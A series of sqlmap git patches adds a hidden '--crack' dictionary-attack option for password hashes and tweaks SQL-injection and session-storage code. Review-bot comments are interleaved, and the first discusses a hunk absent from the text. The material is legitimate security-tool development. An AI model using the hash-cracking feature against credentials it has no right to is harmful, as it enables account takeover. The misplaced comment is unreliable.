a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -b82a5d34d68888945c51c84810d4d4b3 lib/core/settings.py +3805f9f360e47798a3e6d4da977c83eb lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py 
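Review bot: `key=lambda _: len(_)` in the `attackDumpedTable` hunk is just `key=len`, and the reason for sorting deserves a comment since the loop breaks on the first match: presumably longest-first is meant to prefer a more specific name such as `"username"` over `"user"` when both appear in one table, e.g. `for column in sorted(columns, key=len, reverse=True):  # longest first, so "username" wins over "user"`. Ties between equal-length names fall back to the original `columns` order because `sorted` is stable, which is fine but worth knowing. `attackDumpedTable` begins and ends outside this hunk.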
@@ -108,7 +108,7 @@ f9867bbfcd6d31916ca73e72e95fd881 lib/utils/deps.py f7af65aa47329d021e2b2cc8521b42a4 lib/utils/getch.py 7af29f61302c8693cd6436d4b69e22d3 lib/utils/har.py 1205648d55649accafae2cc77d647aa0 lib/utils/hashdb.py -d0f4d56c5d6a09a4635035e233d4a782 lib/utils/hash.py +4b50c02e803c874c1d03873fd29d63ee lib/utils/hash.py 011d2dbf589e0faa0deca61a651239cc lib/utils/htmlentities.py 1e5532ede194ac9c083891c2f02bca93 lib/utils/__init__.py 527409077a094b63c88f3291138b1c81 lib/utils/pivotdumptable.py From 01d5da18e3ffe547694c337b5a0e0d34061d908f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 17 Dec 2018 17:38:47 +0100 Subject: [PATCH 399/428] Adding experimental option --crack --- lib/controller/controller.py | 4 ++++ lib/core/common.py | 16 ++++++++++------ lib/core/settings.py | 2 +- lib/parse/cmdline.py | 6 +++++- lib/utils/hash.py | 28 +++++++++++++++++++++++----- txt/checksum.md5 | 10 +++++----- 6 files changed, 48 insertions(+), 18 deletions(-) diff --git a/lib/controller/controller.py b/lib/controller/controller.py index 864ea91c9cc..cc9646079c7 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ -71,6 +71,7 @@ from lib.core.settings import USER_AGENT_ALIASES from lib.core.target import initTargetEnv from lib.core.target import setupTargetEnv +from lib.utils.hash import crackHashFile def _selectInjection(): """ @@ -268,6 +269,9 @@ def start(): check if they are dynamic and SQL injection affected """ + if conf.hashFile: + crackHashFile(conf.hashFile) + if conf.direct: initTargetEnv() setupTargetEnv() diff --git a/lib/core/common.py b/lib/core/common.py index 669288576ca..d0fd775b8b0 100644 --- a/lib/core/common.py +++ b/lib/core/common.py 
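Review bot: The new `crackHashFile(conf.hashFile)` call in `start()` has no `return` after it, so a `--crack` invocation continues into `if conf.direct:` and whatever target handling follows, even though the cmdline change in this commit lets `--crack` be the only option supplied; if crack-only is the intended behaviour, add `return` after the call, and if not, a comment should say that cracking is meant to precede a normal scan. This runs before `initTargetEnv()`, so presumably no session or hashDB is set up yet, which appears to be what the `conf.hashDB` guards added to `lib/core/common.py` in this commit compensate for. `start()` continues outside this hunk.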
@@ -4343,19 +4343,23 @@ def hashDBWrite(key, value, serialize=False): Helper function for writing session data to HashDB """ - _ = '|'.join((str(_) if not isinstance(_, basestring) else _) for _ in (conf.hostname, conf.path.strip('/') if conf.path is not None else conf.port, key, HASHDB_MILESTONE_VALUE)) - conf.hashDB.write(_, value, serialize) + if conf.hashDB: + _ = '|'.join((str(_) if not isinstance(_, basestring) else _) for _ in (conf.hostname, conf.path.strip('/') if conf.path is not None else conf.port, key, HASHDB_MILESTONE_VALUE)) + conf.hashDB.write(_, value, serialize) def hashDBRetrieve(key, unserialize=False, checkConf=False): """ Helper function for restoring session data from HashDB """ - _ = '|'.join((str(_) if not isinstance(_, basestring) else _) for _ in (conf.hostname, conf.path.strip('/') if conf.path is not None else conf.port, key, HASHDB_MILESTONE_VALUE)) - retVal = conf.hashDB.retrieve(_, unserialize) if kb.resumeValues and not (checkConf and any((conf.flushSession, conf.freshQueries))) else None + retVal = None + + if conf.hashDB: + _ = '|'.join((str(_) if not isinstance(_, basestring) else _) for _ in (conf.hostname, conf.path.strip('/') if conf.path is not None else conf.port, key, HASHDB_MILESTONE_VALUE)) + retVal = conf.hashDB.retrieve(_, unserialize) if kb.resumeValues and not (checkConf and any((conf.flushSession, conf.freshQueries))) else None - if not kb.inferenceMode and not kb.fileReadMode and isinstance(retVal, basestring) and any(_ in retVal for _ in (PARTIAL_VALUE_MARKER, PARTIAL_HEX_VALUE_MARKER)): - retVal = None + if not kb.inferenceMode and not kb.fileReadMode and isinstance(retVal, basestring) and any(_ in retVal for _ in (PARTIAL_VALUE_MARKER, PARTIAL_HEX_VALUE_MARKER)): + retVal = None return retVal diff --git a/lib/core/settings.py b/lib/core/settings.py index 70f62b8b7d5..ab5adcf73e2 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
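Review bot: hashDBWrite and hashDBRetrieve now each carry a byte-identical copy of the HashDB key expression (`'|'.join(... conf.hostname, conf.path..., key, HASHDB_MILESTONE_VALUE)`) plus the same new `if conf.hashDB:` guard, so a future change to the key format has to be made twice; a small helper such as `def _hashDBKey(key):` returning that join would keep the two in step. In hashDBRetrieve the partial-value check now also runs when `retVal` stayed `None`; the `isinstance(retVal, basestring)` test makes that harmless, but a short comment saying so saves the next reader a double-take. Both docstrings could also state that the functions are no-ops (write) or return `None` (retrieve) when no HashDB is open.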
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.25" +VERSION = "1.2.12.26" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 2c867b88e35..9cc4d847cd3 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -668,6 +668,10 @@ def cmdLineParser(argv=None): help="Simple wizard interface for beginner users") # Hidden and/or experimental options + parser.add_option("--crack", dest="hashFile", + help=SUPPRESS_HELP) + #help="Load and crack hashes from a file") + parser.add_option("--dummy", dest="dummy", action="store_true", help=SUPPRESS_HELP) @@ -884,7 +888,7 @@ def _(self, *args): if args.dummy: args.url = args.url or DUMMY_URL - if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, args.purge, args.sitemapUrl, args.listTampers)): + if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, args.purge, args.sitemapUrl, args.listTampers, args.hashFile)): errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --list-tampers, --wizard, --update, --purge or --dependencies). " errMsg += "Use -h for basic and -hh for advanced help\n" parser.error(errMsg) diff --git a/lib/utils/hash.py b/lib/utils/hash.py index e6381d58ac5..39e9b2ea13a 100644 --- a/lib/utils/hash.py +++ b/lib/utils/hash.py 
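Review bot: The `--crack` option is registered with a commented-out `#help="Load and crack hashes from a file")` line sitting inside the `parser.add_option(...)` argument list; commented-out code there reads as a stray closing paren and is easy to break when the call is next edited. Either drop it or move the intent into a normal comment above the call, e.g. `# --crack: load and crack hashes from a file (experimental, help suppressed until stable)`. The mandatory-option check now accepts `args.hashFile` while its error text still omits `--crack`; that is consistent with the option being hidden, but a brief `# --crack is hidden, hence not listed in errMsg` would record that it is deliberate. cmdLineParser begins and ends outside both hunks.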
@@ -1078,7 +1078,8 @@ def dictionaryAttack(attack_dict): gc.enable() if retVal: - conf.hashDB.beginTransaction() + if conf.hashDB: + conf.hashDB.beginTransaction() while not retVal.empty(): user, hash_, word = item = retVal.get(block=False) @@ -1086,7 +1087,8 @@ def dictionaryAttack(attack_dict): hashDBWrite(hash_, word) results.append(item) - conf.hashDB.endTransaction() + if conf.hashDB: + conf.hashDB.endTransaction() clearConsoleLine() @@ -1171,15 +1173,17 @@ class Value(): if _multiprocessing: gc.enable() - if retVal: - conf.hashDB.beginTransaction() + if retVal and conf.hashDB: + if conf.hashDB: + conf.hashDB.beginTransaction() while not retVal.empty(): user, hash_, word = item = retVal.get(block=False) hashDBWrite(hash_, word) results.append(item) - conf.hashDB.endTransaction() + if conf.hashDB: + conf.hashDB.endTransaction() clearConsoleLine() @@ -1194,3 +1198,17 @@ class Value(): logger.warn(warnMsg) return results + +def crackHashFile(hashFile): + i = 0 + attack_dict = {} + + for line in getFileItems(conf.hashFile): + if ':' in line: + user, hash_ = line.split(':', 1) + attack_dict[user] = [hash_] + else: + attack_dict["%s%d" % (DUMMY_USER_PREFIX, i)] = [line] + i += 1 + + dictionaryAttack(attack_dict) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index b253cf02f26..f96d3655fc7 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
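Review bot: In the `@@ -1171` hunk the outer condition became `if retVal and conf.hashDB:`, and the `while not retVal.empty(): ... results.append(item)` loop sits inside that block, so when no HashDB is open (the standalone `--crack` case this commit introduces) the cracked items are never drained into `results` and the caller gets nothing back. The inner `if conf.hashDB:` around `beginTransaction()` is also redundant under that outer test. The `@@ -1078` hunk above has the right shape; mirror it: keep `if retVal:` as the outer test and let `if conf.hashDB:` guard only the `beginTransaction()` and `endTransaction()` calls. dictionaryAttack begins and ends outside the hunk.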
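Review bot: crackHashFile takes `hashFile` but reads `conf.hashFile` in `for line in getFileItems(conf.hashFile):`, so the parameter is dead and the function cannot be pointed at any other file; use `getFileItems(hashFile)`. With `attack_dict[user] = [hash_]` a second `user:hash` line for the same user silently replaces the first, so a file holding several hashes per account loses all but the last; `attack_dict.setdefault(user, []).append(hash_)` keeps them all. The function also has no docstring; one sentence stating the accepted line formats (`user:hash` or a bare hash, which gets a `DUMMY_USER_PREFIX` user) would help, and whether blank lines are filtered depends on getFileItems, which is not visible here.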
@@ -24,12 +24,12 @@ b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py 0f0feede9750be810d2b8a7ab159b7b0 lib/controller/checks.py -ad968ee04e93f6f850d6b7e5ac0073c5 lib/controller/controller.py +ae444b08253e10bc4553f011d6100b28 lib/controller/controller.py 988b548f6578adf9cec17afdeee8291c lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py e62309b22a59e60b270e62586f169441 lib/core/agent.py c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py -a78c563bbaeebd958b25303d83dfe3f2 lib/core/common.py +ae4bf844c42f9a36ebbe8444e89f7041 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -3805f9f360e47798a3e6d4da977c83eb lib/core/settings.py +758c731f879a5989288d8809a8d54567 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py @@ -60,7 +60,7 @@ b35636650cfe721f5cc47fb91737c061 lib/core/update.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py -30d7cbada42154dcbb17f4ca969d812a lib/parse/cmdline.py +cfd7938668213fef65a7570997b78403 lib/parse/cmdline.py fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py 6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py 
@@ -108,7 +108,7 @@ f9867bbfcd6d31916ca73e72e95fd881 lib/utils/deps.py f7af65aa47329d021e2b2cc8521b42a4 lib/utils/getch.py 7af29f61302c8693cd6436d4b69e22d3 lib/utils/har.py 1205648d55649accafae2cc77d647aa0 lib/utils/hashdb.py -4b50c02e803c874c1d03873fd29d63ee lib/utils/hash.py +eb2aa3fa9ebdf4cb6ac3e005f7df1e9b lib/utils/hash.py 011d2dbf589e0faa0deca61a651239cc lib/utils/htmlentities.py 1e5532ede194ac9c083891c2f02bca93 lib/utils/__init__.py 527409077a094b63c88f3291138b1c81 lib/utils/pivotdumptable.py From c5802a5367edbcf13c10036caf8bf7638ea928ef Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 17 Dec 2018 17:43:11 +0100 Subject: [PATCH 400/428] Minor update related to the last commit --- lib/core/option.py | 4 ++++ lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 7 insertions(+), 3 deletions(-) diff --git a/lib/core/option.py b/lib/core/option.py index 13e17fdf8e7..a5c6c85a4bd 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -2437,6 +2437,10 @@ def _basicOptionValidation(): errMsg = "value for option '--union-char' must be an alpha-numeric value (e.g. 1)" raise SqlmapSyntaxException(errMsg) + if conf.hashFile and any((conf.direct, conf.url, conf.logFile, conf.bulkFile, conf.googleDork, conf.configFile, conf.requestFile, conf.updateAll, conf.smokeTest, conf.liveTest, conf.wizard, conf.dependencies, conf.purge, conf.sitemapUrl, conf.listTampers)): + errMsg = "option '--crack' should be used as a stand-alone" + raise SqlmapSyntaxException(errMsg) + if isinstance(conf.uCols, basestring): if not conf.uCols.isdigit() and ("-" not in conf.uCols or len(conf.uCols.split("-")) != 2): errMsg = "value for option '--union-cols' must be a range with hyphon " diff --git a/lib/core/settings.py b/lib/core/settings.py index ab5adcf73e2..b23bacbc82d 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
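Review bot: The standalone check for `--crack` in _basicOptionValidation repeats, as an inline `any((conf.direct, conf.url, ...))` tuple, the same option names that the mandatory-option check in cmdline.py enumerates, and the two lists will drift the next time an option is added to one of them. A shared module-level tuple of option names iterated with `getattr(conf, name)` would give one source of truth, or at minimum a comment pointing at the sibling list in cmdline.py. _basicOptionValidation begins and ends outside the hunk.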
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.26" +VERSION = "1.2.12.27" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index f96d3655fc7..7c8f3423b5a 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -42,14 +42,14 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 7d6edc552e08c30f4f4d49fa93b746f1 lib/core/optiondict.py -01f7cc33862b2eb2e777f5aff326e2fb lib/core/option.py +44819c32482eedd3dbf5d7c1fd108a7a lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 6783160150b4711d02c56ee2beadffdb lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -758c731f879a5989288d8809a8d54567 lib/core/settings.py +e169d79e808fc6c60f8f827a18fae1bf lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py From 61e0459ec8f149a3ccd13209dbd25156b77022af Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 17 Dec 2018 17:48:22 +0100 Subject: [PATCH 401/428] Minor update --- lib/core/option.py | 2 +- lib/core/settings.py | 2 +- lib/parse/cmdline.py | 2 +- txt/checksum.md5 | 6 +++--- 4 files changed, 6 insertions(+), 6 deletions(-) diff --git a/lib/core/option.py b/lib/core/option.py index a5c6c85a4bd..23dce9cba4e 100644 --- a/lib/core/option.py +++ b/lib/core/option.py 
@@ -2438,7 +2438,7 @@ def _basicOptionValidation(): raise SqlmapSyntaxException(errMsg) if conf.hashFile and any((conf.direct, conf.url, conf.logFile, conf.bulkFile, conf.googleDork, conf.configFile, conf.requestFile, conf.updateAll, conf.smokeTest, conf.liveTest, conf.wizard, conf.dependencies, conf.purge, conf.sitemapUrl, conf.listTampers)): - errMsg = "option '--crack' should be used as a stand-alone" + errMsg = "option '--crack' should be used as a standalone" raise SqlmapSyntaxException(errMsg) if isinstance(conf.uCols, basestring): diff --git a/lib/core/settings.py b/lib/core/settings.py index b23bacbc82d..d4554b649db 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.27" +VERSION = "1.2.12.28" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 9cc4d847cd3..9b8ec070478 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -670,7 +670,7 @@ def cmdLineParser(argv=None): # Hidden and/or experimental options parser.add_option("--crack", dest="hashFile", help=SUPPRESS_HELP) - #help="Load and crack hashes from a file") +# help="Load and crack hashes from a file (standalone)") parser.add_option("--dummy", dest="dummy", action="store_true", help=SUPPRESS_HELP) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 7c8f3423b5a..b9082425c25 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
@@ -42,14 +42,14 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 7d6edc552e08c30f4f4d49fa93b746f1 lib/core/optiondict.py -44819c32482eedd3dbf5d7c1fd108a7a lib/core/option.py +9e12c63430c653970cbc4c6bc6984784 lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 6783160150b4711d02c56ee2beadffdb lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -e169d79e808fc6c60f8f827a18fae1bf lib/core/settings.py +7bce3bb49e9a84585266da82e3a6fdb5 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py @@ -60,7 +60,7 @@ b35636650cfe721f5cc47fb91737c061 lib/core/update.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py -cfd7938668213fef65a7570997b78403 lib/parse/cmdline.py +0f92bdaacd8210520bdd6e0c531c70cd lib/parse/cmdline.py fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py 6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py From 9727f0d6910a63eac07e795e9683938f1be4c9ee Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 17 Dec 2018 22:49:09 +0100 Subject: [PATCH 402/428] Minor patch (--parse-errors with lots of HTML inside) --- lib/core/settings.py | 4 ++-- txt/checksum.md5 | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index d4554b649db..0b0edc75770 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.28" +VERSION = "1.2.12.29" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -332,7 +332,7 @@ # Regular expressions used for parsing error messages (--parse-errors) ERROR_PARSING_REGEXES = ( r"\[Microsoft\]\[ODBC SQL Server Driver\]\[SQL Server\](?P[^<]+)", - r"[^<]*(fatal|error|warning|exception)[^<]*:?\s*(?P.+?)", + r"[^<]*(fatal|error|warning|exception)[^<]*:?\s*(?P[^<]+)", r"(?m)^\s*(fatal|error|warning|exception):?\s*(?P[^\n]+?)$", r"(?P[^\n>]*SQL Syntax[^\n<]+)", r"
  • Error Type:
    (?P.+?)
  • ", diff --git a/txt/checksum.md5 b/txt/checksum.md5 index b9082425c25..83ef7466489 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -7bce3bb49e9a84585266da82e3a6fdb5 lib/core/settings.py +06d86fa6e0530b5821793d63e8351f0a lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py From daafe9b74a31f80012a4dfc8cca7003696be11df Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 17 Dec 2018 23:25:23 +0100 Subject: [PATCH 403/428] Bug fix (OR boolean based blind caused trouble to UNION with negative logic) --- lib/core/settings.py | 2 +- lib/techniques/union/test.py | 18 +++++++++++++++++- txt/checksum.md5 | 4 ++-- 3 files changed, 20 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 0b0edc75770..f6f6cdfbd48 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.29" +VERSION = "1.2.12.30" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/techniques/union/test.py b/lib/techniques/union/test.py index 591fc4f5357..6197cce432e 100644 --- a/lib/techniques/union/test.py +++ b/lib/techniques/union/test.py 
@@ -318,8 +318,24 @@ def unionTest(comment, place, parameter, value, prefix, suffix): if conf.direct: return + negativeLogic = kb.negativeLogic kb.technique = PAYLOAD.TECHNIQUE.UNION - validPayload, vector = _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix) + + try: + if negativeLogic: + pushValue(kb.negativeLogic) + pushValue(conf.string) + pushValue(conf.code) + + kb.negativeLogic = False + conf.string = conf.code = None + + validPayload, vector = _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix) + finally: + if negativeLogic: + conf.code = popValue() + conf.string = popValue() + kb.negativeLogic = popValue() if validPayload: validPayload = agent.removePayloadDelimiters(validPayload) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 83ef7466489..48d6a68ff7d 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -06d86fa6e0530b5821793d63e8351f0a lib/core/settings.py +5192aa6feb4e6d598ec4334c39f9ba2f lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py @@ -99,7 +99,7 @@ db208ab47de010836c6bf044e2357861 lib/techniques/blind/inference.py 686904374067047b521151301321b30a lib/techniques/error/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py -f7813cdee00df8f98d6f811475e520a1 lib/techniques/union/test.py +7047a66c35ce0c820931fc5bf73008a3 lib/techniques/union/test.py 1f2ff182a28b2baf9f9fe7477c76618d lib/techniques/union/use.py fd1ede20ec674518a54966eaf0c9f8c6 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py 
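Review bot: The save/restore in unionTest uses three separate `pushValue`/`popValue` pairs whose correctness depends on popping in exactly the reverse order, and both the `try` body and the `finally` re-test `negativeLogic`; a single push of a tuple removes the ordering hazard: `pushValue((kb.negativeLogic, conf.string, conf.code))` in the `try` and `kb.negativeLogic, conf.string, conf.code = popValue()` in the `finally`. `pushValue(kb.negativeLogic)` could also be written `pushValue(negativeLogic)`, since the two are equal at that point. A one-line comment giving the reason for clearing this state — the commit message's "OR boolean-based blind caused trouble to UNION with negative logic" — would explain the dance to the next reader. unionTest begins and ends outside the hunk.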
From 107d9f90ad666d4963243f1a9f206c15e73a1aa8 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 17 Dec 2018 23:41:04 +0100 Subject: [PATCH 404/428] Minor message update --- lib/controller/controller.py | 3 +++ lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 3 deletions(-) diff --git a/lib/controller/controller.py b/lib/controller/controller.py index cc9646079c7..7b5ee9ce043 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ -642,6 +642,9 @@ def start(): errMsg += "involved (e.g. WAF) maybe you could try to use " errMsg += "option '--tamper' (e.g. '--tamper=space2comment')" + if not conf.randomAgent: + errMsg += " and/or switch '--random-agent'" + raise SqlmapNotVulnerableException(errMsg.rstrip('.')) else: # Flush the flag diff --git a/lib/core/settings.py b/lib/core/settings.py index f6f6cdfbd48..415e0f1e72a 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.30" +VERSION = "1.2.12.31" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 48d6a68ff7d..147c9efdae6 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
@@ -24,7 +24,7 @@ b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py 0f0feede9750be810d2b8a7ab159b7b0 lib/controller/checks.py -ae444b08253e10bc4553f011d6100b28 lib/controller/controller.py +197bdf07f8ea15ecc7e0dafea4f9ae2f lib/controller/controller.py 988b548f6578adf9cec17afdeee8291c lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py e62309b22a59e60b270e62586f169441 lib/core/agent.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -5192aa6feb4e6d598ec4334c39f9ba2f lib/core/settings.py +4bfede0eaaa7ad5767de41ef849de918 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py From 0c3fbc46df9a5098e05819ea12e3c9e67c3e7c14 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 18 Dec 2018 00:08:56 +0100 Subject: [PATCH 405/428] Adding Approach WAF script --- lib/core/settings.py | 2 +- txt/checksum.md5 | 3 ++- waf/approach.py | 27 +++++++++++++++++++++++++++ 3 